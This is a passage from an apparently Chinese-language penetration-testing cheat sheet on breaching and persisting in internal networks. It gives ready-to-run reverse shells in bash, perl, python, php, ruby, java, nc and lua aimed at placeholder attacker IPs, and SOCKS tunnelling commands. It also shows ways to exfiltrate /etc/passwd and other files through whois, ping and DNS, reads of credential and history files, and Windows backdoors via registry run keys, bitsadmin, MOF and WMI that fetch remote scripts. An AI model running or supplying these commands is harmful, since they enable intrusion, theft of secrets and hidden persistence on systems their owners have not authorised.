Server wrapper](#ssh-server-wrapper) - [SSH keylogger](#ssh-keylogger) - [Cymothoa\_进程注入backdoor](#cymothoa_进程注入backdoor) - [rootkit](#rootkit) - [Tools](#tools) - [WEB后门](#web后门) - [横向渗透](#横向渗透) - [端口渗透](#端口渗透) - [端口扫描](#端口扫描-1) - [端口爆破](#端口爆破) - [端口弱口令](#端口弱口令) - [端口溢出](#端口溢出) - [常见的默认端口](#常见的默认端口) - [1、web类(web漏洞/敏感目录)](#1web类web漏洞敏感目录) - [2、数据库类(扫描弱口令)](#2数据库类扫描弱口令) - [3、特殊服务类(未授权/命令执行类/漏洞)](#3特殊服务类未授权命令执行类漏洞) - [4、常用端口类(扫描弱口令/端口爆破)](#4常用端口类扫描弱口令端口爆破) - [5、端口合计所对应的服务](#5端口合计所对应的服务) - [域渗透](#域渗透) - [信息搜集](#信息搜集-1) - [powerview.ps1](#powerviewps1) - [BloodHound](#bloodhound) - [获取域内DNS信息](#获取域内dns信息) - [获取域控的方法](#获取域控的方法) - [SYSVOL](#sysvol) - [MS14-068 Kerberos](#ms14-068-kerberos) - [SPN扫描](#spn扫描) - [Kerberos的黄金门票](#kerberos的黄金门票) - [Kerberos的银票务](#kerberos的银票务) - [域服务账号破解](#域服务账号破解) - [凭证盗窃](#凭证盗窃) - [NTLM relay](#ntlm-relay) - [Kerberos委派](#kerberos委派) - [地址解析协议](#地址解析协议) - [Zerologon](#zerologon) - [noPac](#nopac) - [ADCS](#adcs) - [CVE-2022-26923](#cve-2022-26923) - [获取AD哈希](#获取ad哈希) - [AD持久化](#ad持久化) - [活动目录持久性技巧](#活动目录持久性技巧) - [Security Support Provider](#security-support-provider) - [SID History](#sid-history) - [AdminSDHolder&SDProp ](#adminsdholdersdprop-) - [组策略](#组策略) - [Hook PasswordChangeNotify](#hook-passwordchangenotify) - [Kerberoasting后门](#kerberoasting后门) - [AdminSDHolder](#adminsdholder) - [Delegation](#delegation) - [黄金证书](#黄金证书) - [其他](#其他-1) - [域内主机提权](#域内主机提权) - [Exchange的利用](#exchange的利用) - [TIPS](#tips) - [相关工具](#相关工具) - [在远程系统上执行程序](#在远程系统上执行程序) - [IOT相关](#iot相关) - [中间人](#中间人) - [规避杀软及检测](#规避杀软及检测) - [Bypass Applocker](#bypass-applocker) - [BypassAV](#bypassav) - [痕迹清理](#痕迹清理) - [Windows日志清除](#windows日志清除) - [破坏Windows日志记录功能](#破坏windows日志记录功能) - [Metasploit](#metasploit) - [3389登陆记录清除](#3389登陆记录清除) ## 信息搜集 ### 开源情报信息收集(OSINT) #### github * Github_Nuggests(自动爬取Github上文件敏感信息泄露) :https://github.com/az0ne/Github_Nuggests * GSIL(能够实现近实时(15分钟内)的发现Github上泄露的信息) :https://github.com/FeeiCN/GSIL * x-patrol(小米团队的):https://github.com/MiSecurity/x-patrol #### whois查询/注册人反查/邮箱反查/相关资产 * 站长之家:http://whois.chinaz.com/?DomainName=target.com&ws= * 爱站:https://whois.aizhan.com/target.com/ * 微步在线:https://x.threatbook.cn/ * IP反查:https://dns.aizhan.com/ * 天眼查:https://www.tianyancha.com/ * 虎妈查:http://www.whomx.com/ * 历史漏洞查询 : * 在线查询:http://wy.zone.ci/ * 自搭建:https://github.com/hanc00l/wooyun_public/ #### google hacking ### 创建企业密码字典 #### 字典列表 * passwordlist:https://github.com/lavalamp-/password-lists * 猪猪侠字典:https://pan.baidu.com/s/1dFJyedz [Blasting_dictionary](https://github.com/rootphantomer/Blasting_dictionary)(分享和收集各种字典,包括弱口令,常用密码,目录爆破。数据库爆破,编辑器爆破,后台爆破等) * 针对特定的厂商,重点构造厂商相关域名的字典 ``` ['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!'] ``` #### 密码生成 * GenpAss(中国特色的弱口令生成器: https://github.com/RicterZ/genpAss/ * passmaker(可以自定义规则的密码字典生成器) :https://github.com/bit4woo/passmaker * pydictor(强大的密码生成器) :https://github.com/LandGrey/pydictor #### 邮箱列表获取 * theHarvester :https://github.com/laramies/theHarvester * 获取一个邮箱以后导出通讯录 * LinkedInt :https://github.com/mdsecactivebreach/LinkedInt * Mailget:https://github.com/Ridter/Mailget #### 泄露密码查询 * ghostproject: https://ghostproject.fr/ * pwndb: https://pwndb2am4tzkvold.onion.to/ #### 对企业外部相关信息进行搜集 ##### 子域名获取 * Layer子域名挖掘机4.2纪念版 * subDomainsBrute :https://github.com/lijiejie/subDomainsBrute * wydomain :https://github.com/ring04h/wydomain * Sublist3r :https://github.com/aboul3la/Sublist3r * 企查查:https://www.qcc.com/ * 天眼查:https://www.tianyancha.com/ * site:target.com:https://www.google.com * Github代码仓库 * 抓包分析请求返回值(跳转/文件上传/app/api接口等) * 站长帮手links等在线查询网站 * 域传送漏洞 > Linux ``` dig @ns.example.com example=.com AXFR ``` Windows ``` nslookup -type=ns xxx.yyy.cn #查询解析某域名的DNS服务器 nslookup #进入nslookup交互模式 server dns.domian.com #指定dns服务器 ls xxx.yyy.cn #列出域信息 ``` * GetDomainsBySSL.py :https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a&type=note#/ * censys.io证书 :https://censys.io/certificates?q=target.com * crt.sh证书查询:https://crt.sh/?q=%25.target.com * shadon :https://www.shodan.io/ * zoomeye :https://www.zoomeye.org/ * fofa :https://fofa.so/ * censys:https://censys.io/ * dnsdb.io :https://dnsdb.io/zh-cn/search?q=target.com * api.hackertarget.com :http://api.hackertarget.com/reversedns/?q=target.com * community.riskiq.com :https://community.riskiq.com/Search/target.com * subdomain3 :https://github.com/yanxiu0614/subdomain3 * FuzzDomain :https://github.com/Chora10/FuzzDomain * dnsdumpster.com :https://dnsdumpster.com/ * phpinfo.me :https://phpinfo.me/domain/ * dns开放数据接口 :https://dns.bufferover.run/dns?q=baidu.com ## 进入内网 ### 基于企业弱账号漏洞 * VPN(通过邮箱,密码爆破,社工等途径获取VPN) * 企业相关运维系统(zabbix等) ### 基于系统漏洞进入 * Metasploit(漏洞利用框架):https://github.com/rapid7/metasploit-framework * 漏洞利用脚本 ### 网站应用程序渗透 * SQL注入 * 跨站脚本(XSS) * 跨站请求伪造(CSRF) * SSRF([ssrf_proxy](https://github.com/bcoles/ssrf_proxy)) * 功能/业务逻辑漏洞 * 其他漏洞等 * CMS-内容管理系统漏洞 * 企业自建代理 ### 无线Wi-Fi接入 ## 隐匿攻击 ### Command and Control * ICMP :https://pentestlab.blog/2017/07/28/command-and-control-icmp/ * DNS :https://pentestlab.blog/2017/09/06/command-and-control-dns/ * DropBox :https://pentestlab.blog/2017/08/29/command-and-control-dropbox/ * Gmail :https://pentestlab.blog/2017/08/03/command-and-control-gmail/ * Telegram :http://drops.xmd5.com/static/drops/tips-16142.html * Twitter :https://pentestlab.blog/2017/09/26/command-and-control-twitter/ * Website Keyword :https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/ * PowerShell :https://pentestlab.blog/2017/08/19/command-and-control-powershell/ * Windows COM :https://pentestlab.blog/2017/09/01/command-and-control-windows-com/ * WebDAV :https://pentestlab.blog/2017/09/12/command-and-control-webdav/ * Office 365 :https://www.anquanke.com/post/id/86974 * HTTPS :https://pentestlab.blog/2017/10/04/command-and-control-https/ * Kernel :https://pentestlab.blog/2017/10/02/command-and-control-kernel/ * Website :https://pentestlab.blog/2017/11/14/command-and-control-website/ * WMI :https://pentestlab.blog/2017/11/20/command-and-control-wmi/ * WebSocket :https://pentestlab.blog/2017/12/06/command-and-control-websocket/ * Images :https://pentestlab.blog/2018/01/02/command-and-control-images/ * Web Interface :https://pentestlab.blog/2018/01/03/command-and-control-web-interface/ * JavaScript :https://pentestlab.blog/2018/01/08/command-and-control-javascript/ * ... ### Fronting * [Domain Fronting ](https://evi1cg.me/archives/Domain_Fronting.html) * [Tor_Fronting.](https://evi1cg.me/archives/Tor_Fronting.html) ### 代理 * VPN * shadowsockts :https://github.com/shadowsocks * HTTP :http://cn-proxy.com/ * Tor ## 内网跨边界应用 ### 内网跨边界转发 * [NC端口转发](https://blog.csdn.net/l_f0rm4t3d/article/details/24004555) * [LCX端口转发 ](http://blog.chinaunix.net/uid-53401-id-4407931.html) * [nps](https://github.com/cnlh/nps) -> 个人用觉得比较稳定 ~ * [frp](https://github.com/fatedier/frp) * 代理脚本 1. [Tunna ](https://github.com/SECFORCE/Tunna) 2. [Reduh ](https://github.com/sensepost/reDuh) * ... ### 内网跨边界代理穿透 #### [EW](https://rootkiter.com/EarthWorm/) 正向 SOCKS v5 服务器: ``` ./ew -s ssocksd -l 1080 ``` 反弹 SOCKS v5 服务器: a) 先在一台具有公网 ip 的主机A上运行以下命令: ``` $ ./ew -s rcsocks -l 1080 -e 8888 ``` b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口 ``` $ ./ew -s rssocks -d 1.1.1.1 -e 8888 ``` 多级级联 ``` $ ./ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 $ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999 ``` lcx_tran 的用法 ``` $ ./ew -s ssocksd -l 9999 $ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 ``` lcx_listen、lcx_slave 的用法 ``` $ ./ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s ssocksd -l 9999 $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 ``` “三级级联”的本地SOCKS测试用例以供参考 ``` $ ./ew -s rcsocks -l 1080 -e 8888 $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 $ ./ew -s lcx_listen -l 9999 -e 7777 $ ./ew -s rssocks -d 127.0.0.1 -e 7777 ``` #### [Termite](https://rootkiter.com/Termite/) 使用说明:https://rootkiter.com/Termite/README.txt #### 代理脚本 reGeorg :https://github.com/sensepost/reGeorg Neo-reGeorg:https://github.com/L-codes/Neo-reGeorg pystinger(毒刺):https://github.com/FunnyWolf/pystinger ABPTTS:https://github.com/nccgroup/ABPTTS ### shell反弹 bash ``` bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ``` perl ``` perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` python ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` php ``` php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ``` ruby ``` ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ``` java ``` r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` nc ``` #使用-e nc -e /bin/sh 223.8.200.234 1234 ``` ``` #不使用-e mknod /tmp/backpipe p /bin/sh 0/tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe ``` lua ``` lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" ``` ### 内网文件的传输和下载 wput ``` wput dir_name ftp://linuxpig:123456@host.com/ ``` wget ``` wget http://site.com/1.rar -O 1.rar ``` ariac2(需安装) ``` aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2 ``` powershell ``` $p = New-Object System.Net.WebClient $p.DownloadFile("http://domain/file","C:%homepath%file") ``` vbs脚本 ``` Set args = Wscript.Arguments Url = "http://domain/file" dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", Url, False xHttp.Send with bStrm .type = 1 ' .open .write xHttp.responseBody .savetofile " C:\%homepath%\file", 2 ' end with ``` >执行 :cscript test.vbs Perl ``` #!/usr/bin/perl use LWP::Simple; getstore("http://domain/file", "file"); ``` >执行:perl test.pl Python ``` #!/usr/bin/python import urllib2 u = urllib2.urlopen('http://domain/file') localFile = open('local_file', 'w') localFile.write(u.read()) localFile.close() ``` >执行:python test.py Ruby ``` #!/usr/bin/ruby require 'net/http' Net::HTTP.start("www.domain.com") { |http| r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) } } ``` >执行:ruby test.rb PHP ``` <?php $url = 'http://www.example.com/file'; $path = '/path/to/file'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); file_put_contents($path, $data); ?> ``` >执行:php test.php NC attacker ``` cat file | nc -l 1234 ``` target ``` nc host_ip 1234 > file ``` FTP ``` ftp 127.0.0.1 username password get file exit ``` TFTP ``` tftp -i host GET C:%homepath%file location_of_file_on_tftp_server ``` Bitsadmin ``` bitsadmin /transfer n http://domain/file c:%homepath%file ``` Window 文件共享 ``` net use x: \127.0.0.1\share /user:example.comuserID myPassword ``` SCP 本地到远程 ``` scp file user@host.com:/tmp ``` 远程到本地 ``` scp user@host.com:/tmp file ``` rsync 远程rsync服务器中拷贝文件到本地机 ``` rsync -av root@192.168.78.192::www /databack ``` 本地机器拷贝文件到远程rsync服务器 ``` rsync -av /databack root@192.168.78.192::www ``` certutil.exe ``` certutil.exe -urlcache -split -f http://site.com/file ``` copy ``` copy \\IP\ShareName\file.exe file.exe ``` WHOIS 接收端 Host B: ``` nc -vlnp 1337 | sed "s/ //g" | base64 -d ``` 发送端 Host A: ``` whois -h host_ip -p 1337 `cat /etc/passwd | base64` ``` [WHOIS + TAR](https://twitter.com/mubix/status/1102780436118409216) First: ``` ncat -k -l -p 4444 | tee files.b64 #tee to a file so you can make sure you have it ``` Next ``` tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits ``` Finally ``` cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv #to get the files out ``` PING 发送端: ``` xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done ``` 接收端`ping_receiver.py`: ``` import sys try: from scapy.all import * except: print("Scapy not found, please install scapy: pip install scapy") sys.exit(0) def process_packet(pkt): if pkt.haslayer(ICMP): if pkt[ICMP].type == 8: data = pkt[ICMP].load[-4:] print(f'{data.decode("utf-8")}', flush=True, end="", sep="") sniff(iface="eth0", prn=process_packet) ``` ``` python3 ping_receiver.py ``` DIG 发送端: ``` xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done ``` 接收端`dns_reciver.py`: ``` try: from scapy.all import * except: print("Scapy not found, please install scapy: pip install scapy") def process_packet(pkt): if pkt.haslayer(DNS): domain = pkt[DNS][DNSQR].qname.decode('utf-8') root_domain = domain.split('.')[1] if root_domain.startswith('gooogle'): print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}', flush=True, end='') sniff(iface="eth0", prn=process_packet) ``` ``` python3 dns_reciver.py ``` ... ### 搭建 HTTP server python2 ``` python -m SimpleHTTPServer 1337 ``` python3 ``` python -m http.server 1337 ``` PHP 5.4+ ``` php -S 0.0.0.0:1337 ``` ruby ``` ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start' ``` ``` ruby -run -e httpd . -p 1337 ``` Perl ``` perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start' ``` ``` perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })' ``` busybox httpd ``` busybox httpd -f -p 8000 ``` ## 内网信息搜集 ### 本机信息搜集 #### 1、用户列表 windows用户列表 分析邮件用户,内网[域]邮件用户,通常就是内网[域]用户 #### 2、进程列表 析杀毒软件/安全监控工具等 邮件客户端 VPN ftp等 #### 3、服务列表 与安全防范工具有关服务[判断是否可以手动开关等] 存在问题的服务[权限/漏洞] #### 4、端口列表 开放端口对应的常见服务/应用程序[匿名/权限/漏洞等] 利用端口进行信息收集 #### 5、补丁列表 分析 Windows 补丁 第三方软件[Java/Oracle/Flash 等]漏洞 #### 6、本机共享 本机共享列表/访问权限 本机访问的域共享/访问权限 #### 7、本用户习惯分析 历史记录 收藏夹 文档等 #### 8、获取当前用户密码工具 ##### Windows * [mimikatz](https://github.com/gentilkiwi/mimikatz) * [wce](https://github.com/vergl4s/pentesting-dump/tree/master/net/Windows/wce_v1_42beta_x64) * [Invoke-WCMDump ](https://github.com/peewpw/Invoke-WCMDump) * [mimiDbg ](https://github.com/giMini/mimiDbg) * [LaZagne](https://github.com/AlessandroZ/LaZagne) * [nirsoft_package](http://launcher.nirsoft.net/downloads/) * [QuarksPwDump](https://github.com/quarkslab/quarkspwdump) [fgdump](https://github.com/mcandre/fgdump) * 星号查看器等 ##### Linux * [LaZagne](https://github.com/AlessandroZ/LaZagne) * [mimipenguin](https://github.com/huntergregal/mimipenguin) ##### 浏览器 * [HackBrowserData](https://github.com/moonD4rk/HackBrowserData) * [SharpWeb](https://github.com/djhohnstein/SharpWeb) * [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI) * [360SafeBrowsergetpass](https://github.com/hayasec/360SafeBrowsergetpass) ##### 其他 * [SharpDecryptPwd](https://github.com/RcoIl/SharpDecryptPwd) * [Decrypt_Weblogic_Password](https://github.com/TideSec/Decrypt_Weblogic_Password) * [OA-Seeyou](https://github.com/jas502n/OA-Seeyou) ### 扩散信息收集 #### 端口扫描 ##### 常用端口扫描工具 * [nmap](https://nmap.org/) * [masscan](https://github.com/robertdavidgraham/masscan) * [zmap](https://github.com/zmap/zmap) * s扫描器 * 自写脚本等 * NC * ... #### 内网拓扑架构分析 * DMZ * 管理网 * 生产网 * 测试网 #### 常见信息收集命令 ipconfig: ``` ipconfig /all ------> 查询本机 IP 段,所在域等 ``` net: ``` net user ------> 本机用户列表 net localgroup administrators ------> 本机管理员[通常含有域用户] net user /domain ------> 查询域用户 net group /domain ------> 查询域里面的工作组 net group "domain admins" /domain ------> 查询域管理员用户组 net localgroup administrators /domain ------> 登录本机的域管理员 net localgroup administrators workgroup\user001 /add ----->域用户添加到本机 net group "Domain controllers" -------> 查看域控制器(如果有多台) net view ------> 查询同一域内机器列表 net view /domain ------> 查询域列表 net view /domain:domainname ``` dsquery ``` dsquery computer domainroot -limit 65535 && net group "domain computers" /domain ------> 列出该域内所有机器名 dsquery user domainroot -limit 65535 && net user /domain------>列出该域内所有用户名 dsquery subnet ------>列出该域内网段划分 dsquery group && net group /domain ------>列出该域内分组 dsquery ou ------>列出该域内组织单位 dsquery server && net time /domain------>列出该域内域控制器 ``` ### 第三方信息收集 * NETBIOS 信息收集 * SMB 信息收集 * 空会话信息收集 * 漏洞信息收集等 ## 权限提升 ### Windows #### BypassUAC ##### 常用方法 * 使用IFileOperation COM接口 * 使用Wusa.exe的extract选项 * 远程注入SHELLCODE 到傀儡进程 * DLL劫持,劫持系统的DLL文件 * eventvwr.exe and registry hijacking * sdclt.exe * SilentCleanup * wscript.exe * cmstp.exe * 修改环境变量,劫持高权限.Net程序 * 修改注册表HKCU\Software\Classes\CLSID,劫持高权限程序 * 直接提权过UAC ##### 常用工具 * [UACME ](https://github.com/hfiref0x/UACME) * [Bypass-UAC ](https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC) * [Yamabiko ](https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC/Yamabiko) * ... #### 提权 * windows内核漏洞提权 >检测类:[Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester),[WinSystemHelper](https://github.com/brianwrf/WinSystemHelper),[wesng](https://github.com/bitsadmin/wesng) >利用类:[windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits),[BeRoot](https://github.com/AlessandroZ/BeRoot.git) * 服务提权 >数据库服务,ftp服务等 * WINDOWS错误系统配置 * 系统服务的错误权限配置漏洞 * 不安全的注册表权限配置 * 不安全的文件/文件夹权限配置 * 计划任务 * 任意用户以NT AUTHORITY\SYSTEM权限安装msi * 提权脚本 >[PowerUP](https://github.com/HarmJ0y/PowerUp/blob/master/PowerUp.ps1),[ElevateKit](https://github.com/rsmudge/ElevateKit) ### Linux #### 内核溢出提权 [linux-kernel-exploits ](https://github.com/SecWiki/linux-kernel-exploits) #### 计划任务 ``` crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root ``` #### SUID ``` find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \; ``` 寻找可利用bin:https://gtfobins.github.io/ #### 系统服务的错误权限配置漏洞 ``` cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg ``` #### 不安全的文件/文件夹权限配置 ``` cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history ``` #### 找存储的明文用户名,密码 ``` grep -i user [filename] grep -i pass [filename] grep -C 5 "password" [filename] find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla ``` ## 权限维持 ### 系统后门 #### Windows ##### 1、密码记录工具 WinlogonHack WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 一个 Gina 木马主要用来截取 Windows 2000下的密码,WinlogonHack 主要用于截 取 Windows XP 以及 Windows 2003 Server。 键盘记录器 安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB 网页密码等等,这样也可以得到管理员的很多信息。 NTPass 获取管理员口令,一般用 gina 方式来,但有些机器上安装了 pcanywhere 等软件,会导致远程登录的时候出现故障,本软件可实现无障碍截取口令。 Linux 下 openssh 后门 重新编译运行的sshd服务,用于记录用户的登陆密码。 ##### 2、常用的存储Payload位置 **WMI** : 存储: ``` $StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null) $StaticClass.Name = 'Win32_Command' $StaticClass.Put() $StaticClass.Properties.Add('Command' , $Payload) $StaticClass.Put() ``` 读取: ``` $Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value ``` **包含数字签名的PE文件** 利用文件hash的算法缺陷,向PE文件中隐藏Payload,同时不影响该PE文件的数字签名 **特殊ADS** … ``` type putty.exe > ...:putty.exe wmic process call create c:\test\ads\...:putty.exe ``` 特殊COM文件 ``` type putty.exe > \\.\C:\test\ads\COM1:putty.exe wmic process call create \\.\C:\test\ads\COM1:putty.exe ``` 磁盘根目录 ``` type putty.exe >C:\:putty.exe wmic process call create C:\:putty.exe ``` ##### 3、Run/RunOnce Keys 用户级 ``` HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ``` 管理员 ``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ``` ##### 4、BootExecute Key 由于smss.exe在Windows子系统加载之前启动,因此会调用配置子系统来加载当前的配置单元,具体注册表键值为: ``` HKLM\SYSTEM\CurrentControlSet\Control\hivelist HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Session Manager ``` ##### 5、Userinit Key WinLogon进程加载的login scripts,具体键值: ``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ``` ##### 6、Startup Keys ``` HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ``` ##### 7、Services 创建服务 ``` sc create [ServerName] binPath= BinaryPathName ``` ##### 8、Browser Helper Objects 本质上是Internet Explorer启动时加载的DLL模块 ``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects ``` ##### 9、AppInit_DLLs 加载User32.dll会加载的DLL ``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ``` ##### 10、文件关联 ``` HKEY_LOCAL_MACHINE\Software\Classes HKEY_CLASSES_ROOT ``` ##### 11、[bitsadmin](http://www.liuhaihua.cn/archives/357579.html) ``` bitsadmin /create backdoor bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://host.com/calc.sct scrobj.dll" bitsadmin /Resume backdoor ``` ##### 12、[mof ](https://evi1cg.me/archives/Powershell_MOF_Backdoor.html) ``` pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP1"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 1"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consP1"; ScriptingEngine = "JScript"; ScriptText = "GetObject(\"script:https://host.com/test\")"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; }; ``` 管理员执行: ``` mofcomp test.mof ``` ##### 13、[wmi](https://3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe) 每隔60秒执行一次notepad.exe ``` wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe" wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\"" ``` ##### 14、[Userland Persistence With Scheduled Tasks](https://3gstudent.github.io/Userland-registry-hijacking) 劫持计划任务UserTask,在系统启动时加载dll ``` function Invoke-ScheduledTaskComHandlerUserTask { [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')] Param ( [Parameter(Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $Command, [Switch] $Force ) $ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32" if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){ New-Item $ScheduledTaskCommandPath -Force | New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null }else{ Write-Verbose "Key already exists, consider using -Force" exit } if (Test-Path $ScheduledTaskCommandPath) { Write-Verbose "Created registry entries to hijack the UserTask" }else{ Write-Warning "Failed to create registry key, exiting" exit } } Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose ``` ##### 15、[Netsh](https://3gstudent.github.io/Netsh-persistence) ``` netsh add helper c:\test\netshtest.dll ``` 后门触发:每次调用netsh >dll编写:https://github.com/outflanknl/NetshHelperBeacon ##### 16、[Shim](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims) 常用方式: InjectDll RedirectShortcut RedirectEXE ##### 17、[DLL劫持](https://3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5%8B%E8%AF%95) 通过Rattler自动枚举进程,检测是否存在可用dll劫持利用的进程 使用:Procmon半自动测试更精准,常规生成的dll会导致程序执行报错或中断,使用AheadLib配合生成dll劫持利用源码不会影响程序执行 工具:https://github.com/sensepost/rattler 工具:https://github.com/Yonsm/AheadLib ##### 18、[DoubleAgent ](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D)) 编写自定义Verifier provider DLL 通过Application Verifier进行安装 